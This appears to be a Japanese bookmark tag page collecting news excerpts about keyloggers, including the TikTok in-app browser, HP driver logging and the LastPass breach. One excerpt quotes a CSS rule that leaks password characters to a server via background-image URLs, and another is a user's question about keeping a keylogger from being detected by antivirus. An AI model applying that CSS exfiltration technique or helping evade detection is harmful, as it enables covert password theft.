「TikTokは事実上のキーロガー」と専門家、知らないうちにユーザーを侵害する「アプリ内ブラウザ」の脅威とは？

2024/03/31 224 users owa TikTok heard of the worst

開かれたインターネットを目指すソフトウェアエンジニアらによって組織された非営利団体・Open Web Advocacy(OWA)が、ユーザーの目が届かない場所でセキュリティやプライバシーを大きなリスクにさらすアプリ内ブラウザについて提言しました。 In-App Browsers: The worst erosion of user choice you haven't heard of -... 続きを読む

パスワード管理アプリ「LastPass」の情報流出は社員の自宅PCハッキングが原因

2023/03/01 16 users LastPass 一連 社員 原因 パスワード管理アプリ

パスワード管理システム「LastPass」は、2022年8月にソースコード流出が判明したり、2022年12月にはユーザー情報の流出が判明したりと情報流出が相次いで報告されています。新たに、LastPassは一連の情報流出が「従業員のPCが攻撃され、キーロガーを仕込まれた」ことに起因していることを発表しました。 Incident 2 – Ad... 続きを読む

TikTokのiOSアプリも「キーロガーと同じような動作」と開発者が指摘

2022/08/22 10 users トラブルシューティング デバッグ TikTok iOSアプリ

TikTokのiOSアプリは、TikTok外のWebサイトを開くのにアプリ内ブラウザしか使えず、ブラウザはJavaScriptコードでユーザーのキーストロークを入手できるとアプリ開発者が指摘した。TikTokはそのコードは「デバッグ、トラブルシューティング、パフォーマンス監視にのみ使われている」と主張する。 中国ByteDance傘下の米... 続きを読む

Appleが9月に修正したCatalinaの脆弱性は香港市民への攻撃に悪用されていたとGoogle

2021/11/12 19 users Catalina tag Apple 香港市民 脆弱性

この攻撃ではmacOS Catalinaの脆弱性（CVE-2021-30869）を悪用し、Webサイトを訪れたユーザーの端末にバックドアをインストールしていた。このバックドアには侵入した端末を特定するモジュールが含まれ、音声を録音し、画面をキャプチャし、キーロガーをインストールする。 TAGは、この攻撃は、「国家の支援を受けている... 続きを読む

一見普通のUSBケーブルなのにキーボードで打ち込んだ内容をすべてWi-Fi経由で外部に送信してしまう「O.MGケーブル」が登場 - GIGAZINE

2021/09/03 300 users GIGAZINE ハッキング 悪意 挙動 外部

一見すると普通のUSBケーブルですが、実際にPCに挿すと悪意のある挙動をしてハッキングの手助けをするというのが「O.MGケーブル」です。これまでも通常のUSBケーブルと見分けがつかないO.MGケーブルが発表されていたのですが、新たにPCのキーボードに打ち込んだ内容を保存するキーロガーを内蔵し、Wi-Fi経由で入力内容を... 続きを読む

PCにキーロガーを仕掛けたり、調査員で人間関係を操作...現代の探偵会社、最新技術とエグい手法で逃げられない感がすごい - Togetter

2020/06/21 498 users 遺物 FBI pic.twitter.com 仕掛け人 過去

現代の探偵会社の調査方法、最新技術取り込まれまくってるわ、仕掛け人介入して人間関係操作してるわでもはやFBIの域。シャーロックホームズなんぞ過去の遺物レベル。狙われたら逃げられない感すごくて震える。 pic.twitter.com/5AOcaKSJXC 続きを読む

6年以上もこっそりとルーターを介して拡散していたマルウェア「Slingshot」が特定される - GIGAZINE

2018/03/13 36 users GIGAZINE Slingshot Kaspersky

2018年03月13日 13時00分00秒 6年以上もこっそりとルーターを介して拡散していたマルウェア「Slingshot」が特定される by Andres Atehortua コンピューターセキュリティー会社の Kaspersky は、キーロガーの疑いがある事例を分析している中で、 仮想ファイルシステム に介入するマルウェア「 Slingshot 」を特定したと発表しました。Kasperskyに... 続きを読む

CSSだけでキーロガーを作る - R42日記

2018/02/27 361 users localhost maxchehab input URL

2018 - 02 - 21 CSSだけでキーロガーを作る https://github.com/maxchehab/CSS-Keylogging よくもまあこんなこと思いついたなw 要するに、 input [ type = "password" ][ value $= "a" ] { background-image : url( "http://localhost:3000/a" ) ; } ... 続きを読む

CSSをハックしてパスワードを盗み取るキーロガーが登場 - GIGAZINE

2018/02/23 183 users GitHub maxchehab ウェブページ フォント 登場

By Christoph Scholz CSSは、使用するフォントやパーツの色合いなどウェブページのスタイルを指定するファイルですが、そのCSSだけを用いてパスワードを盗み取るコードがGitHub上で公開されています。 GitHub - maxchehab/CSS-Keylogging: Chrome extension and Express server that exploits keylo... 続きを読む

一部のHP製ノートPCにキー入力を記録するバグ、緊急パッチで対応 - CNET Japan

2017/12/12 27 users パク 緊急パッチ CNET Japan HP製ノートPC 一部

ドライバレベルのキーロガーが何百機種ものHP製ノートPCで発見されたことを受けて、同社は緊急パッチをリリースした。 このバグは、「ZwClose」としても知られるセキュリティ研究者のMichael Myng氏によって発見された。Myng氏はSynapticsの「SynTP.sys」というシステムキーボードドライバと、ノートPCのキーボードのバックライトが点灯する仕組みを調べていたとき、キーロガーの... 続きを読む

キーロガー＆マイニング用スクリプト入りのマルウェアがWordPressで流行中、5500近いサイトに感染 - GIGAZINE

2017/12/08 29 users GIGAZINE solution jQuery マルウェア

by Kaitlyn Baker 2017年11月に入って jQuery やGoogle Analyticsのコードに見せかけてマイニング用スクリプトを読み込ませるというマルウェア「cloudflare[.]solution」が流行しています。11月時点では感染サイト数は1833だったのですが、その後、マルウェアは進化して キーロガー の機能も取り込み、感染サイト数が5500に迫っていることがわか... 続きを読む

HP製ノートPCのオーディオドライバーにキーロガー | スラド セキュリティ

2017/05/13 10 users スラド セキュリティアドバイザリー Consumerist

HP製ノートPCのオーディオドライバーにキーロガーの機能が発見されたそうだ( modzeroのブログ記事 、 modzeroのセキュリティアドバイザリー 、 The Registerの記事 、 Consumeristの記事 )。 オーディオドライバーはConexant製で、HP専用に開発されたもののようだ。このドライバーには特殊キーでオーディオハードウェアをコントロールする機能が含まれているのだが... 続きを読む

HP製ノートPCの一部でキー入力が記録されていた--修正をリリース - CNET Japan

2017/05/12 22 users リリース CNET Japan HP製ノートPC 修正 一部

セキュリティ研究者によると、HPの複数のノートPCにインストールされたオーディオドライバにキーロガーのような機能が含まれており、コンピュータへのキー入力を全てログファイルに記録しているという。 スイスのセキュリティ企業Modzeroが現地時間 5月11日 に掲載した セキュリティアドバイザリ によると、そのキーロガー活動はConexant製のHDオーディオドライバパッケージ（バージョン1.0.0.... 続きを読む

HP製PCのオーディオドライバにキーロガーが発見される ～該当ユーザーは対策を推奨、ドライバ開発者が誤って実装か - PC Watch

2017/05/12 82 users オーディオドライバ ふり スイス 監視 実装

スイスのセキュリティ企業modzeroは11日(現地時間)、米HPのPCにプリインストールされているオーディオドライバに、キーロガーを発見したことを発表した。 　キーロガーとは、ユーザーのキーボード入力を監視、記録するもの。利用次第ではIDやパスワード、住所、氏名といった個人情報まで盗むことができるため、セキュリティ上問題視される場合がある。今回のオーディオドライバのキーロガーは、少なくとも201... 続きを読む

HPのPCはユーザーがキーボードで何を打ち込んだか記録している - GIGAZINE

2017/05/12 85 users GIGAZINE キータイピング modzero キーボード

「 HP (ヒューレット・パッカード)」はユーザーのキータイピングを秘密裏に記録する「 キーロガー 」がインストールされたPCやタブレットを20種類以上販売している、と海外セキュリティコンサルティング会社のmodzeroが指摘しています。 [EN] Keylogger in Hewlett-Packard Audio Driver | mod%log https://www.modzero.ch/... 続きを読む

HPのPCにキーロガー？　セキュリティ企業が指摘 - ITmedia NEWS

2017/05/12 309 users ドライバパッケージ オーディオドライバ ログファイル 指摘

全てのキー入力を記録したログファイルが、ユーザーにも読める状態で、Cドライブのフォルダ内に保存されているという。 スイスのセキュリティ企業modzeroは5月11日、HPのPC向けオーディオドライバに、入力内容を記録するキーロガーを見付けたと伝えた。 modzeroによると、問題のオーディオドライバは、半導体メーカーのConexantが開発したもので、HPのWebサイトでドライバパッケージとして提... 続きを読む

HPのPCにキーロガー？　セキュリティ企業が指摘 - ITmedia エンタープライズ

2017/05/12 309 users ドライバパッケージ オーディオドライバ ログファイル 指摘

全てのキー入力を記録したログファイルが、ユーザーにも読める状態で、Cドライブのフォルダ内に保存されているという。 スイスのセキュリティ企業modzeroは5月11日、HPのPC向けオーディオドライバに、入力内容を記録するキーロガーを見付けたと伝えた。 modzeroによると、問題のオーディオドライバは、半導体メーカーのConexantが開発したもので、HPのWebサイトでドライバパッケージとして提... 続きを読む

私がどのようにしてキーロガーをクラックし、最終的に第三者の受信トレイに行きついたか | インフラ・ミドルウェア | POSTD

2016/08/09 222 users POSTD 受信トレイ インフラ・ミドルウェア

ことの始まりは、あるスパムキャンペーンでした。画像1は、スパム向けに仕掛けた罠に最近引っかかった、疑わしいドキュメントファイルが添付されたメールです。文面の英語がとても稚拙なことに気付くかと思いますが、この稚拙さがメール受信者への警告サインとなります。 画像1：スパムサンプル 添付のファイルは、ことの始まりは、あるスパムキャンペーンでした。画像1は、スパム向けに仕掛けた罠に最近引っかかった、疑わし... 続きを読む

世界初の「キーロガー」は旧ソ連がアメリカ大使館のタイプライターに組み込んだものだった - GIGAZINE

2015/10/14 41 users GIGAZINE 国々 スパイ 旧ソ連 諜報員

By Etan J. Tal 他の国が隠している情報を入手する諜報活動が世界中の国々で繰り広げられているのは公然の事実で、専門の訓練をうけたスパイ(諜報員)があらゆる手段を使って情報の収集にあたっていると言われています。かつての冷戦時代にも熾烈なスパイ活動が繰り広げられていましたが、そんな中で旧ソ連はタイプライターの入力を検知して情報を抜き取る「キーロガー」を使用していたことがわかっています。 H... 続きを読む

ホテルのPCにキーロガーが仕込まれていて個人情報や財務データを盗まれる可能性がある - GIGAZINE

2014/07/15 35 users GIGAZINE 勧告 プリンター 公共 財務データ

by Leonid Mamchenkov ホテルには仕事が行えるようにPCやプリンターが設置されていることがありますが、ホテルのPCには個人情報やクレジットカードの情報を盗むためのキーロガーが仕掛けられている恐れがあるとアメリカ合衆国シークレットサービスが2014年7月10日に注意を喚起しました。Krebs on Securityでは勧告の内容とともに公共の場でのインターネット使用におけるオススメ... 続きを読む

生徒が教師のPCにキーロガーを仕込み成績を改竄、黒幕の講師は逃走中 - GIGAZINE

2014/02/03 35 users GIGAZINE 改竄 黒幕 By See-ming Lee

By See-ming Lee コンピュータの入力内容を監視・記録するキーロガーを教師のPCに仕込み、パスワードを解析して成績を改竄したとして11人の生徒が退学処分を受けました。なお、今回の大規模な成績改竄事件の黒幕とされる講師は逃走中とのことです。 11 students removed from Corona del Mar High in hacking case - The Orange ... 続きを読む

「外部に送信されること」を認識した上で適切な利用を：入力内容がそのまま外部に？ オンラインIMEの利用にIIJ-SECTが注意喚起 - ＠IT

2013/12/19 16 users 注意喚起 外部 辞書 一種 同期

「外部に送信されること」を認識した上で適切な利用を：入力内容がそのまま外部に？ オンラインIMEの利用にIIJ-SECTが注意喚起 IIJ-SECT（IIJ group Security Coordination Team）は2013年12月17日、クラウド側で辞書の同期や変換を行う機能を備えた日本語入力システムが、意図せず一種の「キーロガー」として動作してしまう可能性について、ブログで注意を呼び... 続きを読む

キーロガーというソフトをパソコンに入れたところ、トロイの木馬を検出し、削除し... - Yahoo!知恵袋

2012/08/20 8 users マカフィー トロイ 木馬 Yahoo 知恵袋

konjgyfjd232345さん キーロガーというソフトをパソコンに入れたところ、トロイの木馬を検出し、削除しました。となり見てみるとキーロガーが消えていました。キーロガーをトロイの木馬と検出させない方法を教えてください。 ウイルス対策用のソフトは、マカフィーです。 続きを読む

出先のPCなどでグーグルアカウントに安全にログインする方法 - Touch Lab - タッチ ラボ

2012/01/17 236 users 出先 Touch Lab ラボ グーグルアカウント タッチ

この方法は、Googleが提供するQRコードとiPhone(またはAndroid)を組み合わせてログイン(認証)を行うというものです。使用するPC/Mac上でアカウント名・パスワードの入力を行わないため、キーロガー(キー入力を保存するソフト)による、アカウント情報の漏洩を防ぐことができます。ログインの手順は次のとおり。 QRコードでグーグルアカウントにログインする方法準備QRコードを読み取る必要が... 続きを読む

グーグル、E・シュミット会長：「Carrier IQはキーロガー」と非難 - WirelessWire News（ワイヤレスワイヤーニュース）

2011/12/12 8 users パーク シュミット会長 Eric Schmidt 波紋 非難

グーグル（Google）のエリック・シュミット（Eric Schmidt）会長が、スマートフォンユーザーの詳細な活動履歴を記録しているとして波紋を呼んでいるソフトウェア「Carrier IQ」について、「キーロガー・ソフト」であると非難したという。 オランダのハーグで現地時間8日に開催されたインターネットの自由に関するカンファレンスで、シュミット会長は「グーグルはキャリアIQ社の活動に協力したこと... 続きを読む